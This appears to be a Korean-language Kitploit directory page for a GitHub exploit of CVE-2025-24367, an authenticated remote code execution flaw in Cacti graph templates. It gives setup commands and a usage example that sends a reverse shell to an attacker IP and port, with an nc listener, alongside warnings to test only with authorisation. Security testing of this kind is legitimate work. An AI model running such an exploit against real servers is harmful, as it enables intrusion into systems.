Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24367 — Cacti 그래프 템플릿 취약점에 대한 인증된 원격 코드 실행 익스플로잇으로, 승인된 침투 테스트를 위한 리버스 셸 페이로드와 프록시 지원을 포함합니다. | Kitploit
도구/GitHubGitHub/shoshinmaster/cve-2025-24367
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

Cacti 그래프 템플릿 취약점에 대한 인증된 원격 코드 실행 익스플로잇으로, 승인된 침투 테스트를 위한 리버스 셸 페이로드와 프록시 지원을 포함합니다.

저장소 보기
127개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24367 - Cacti 인증된 그래프 템플릿 원격 코드 실행

사용법 및 안전

중요 — 먼저 읽으십시오:
이 저장소와 exploit.py는 교육 및 연구 목적으로만 제공됩니다. 명시적인 서면 승인을 받지 않은 시스템, 네트워크, 서비스에 대해 이 코드를 사용하지 마십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다. 이 코드를 사용함으로써 귀하는 관련 법률 및 기관 정책을 준수하는 데 동의하는 것입니다.


요구 사항

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

사용법

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

예제

스크립트를 실행하기 전에 nc 리스너가 실행 중인지 확인하십시오. 디버깅이 아닌 경우 프록시 없이 스크립트를 실행하십시오:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

매우 중요한 경고

  • 프로덕션 시스템이나 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 대해 실행하지 마십시오.
  • 보안 테스트를 수행하기 전에 항상 서면 승인을 받으십시오.
  • 실험을 위해 격리된 랩 환경(예: VM, 컨테이너, 또는 전용 테스트 네트워크)을 사용하십시오.
  • 귀하의 조직에는 보고 및 공개 정책이 있을 수 있습니다 — 이를 따르십시오.
  • 저자는 이 코드의 오용에 대해 책임을 지지 않습니다.

최종 알림: 이 스크립트와 README는 교육용으로만 사용됩니다. 이러한 도구를 불법적으로 시스템에 접근하는 데 사용하지 마십시오.

도구 다운로드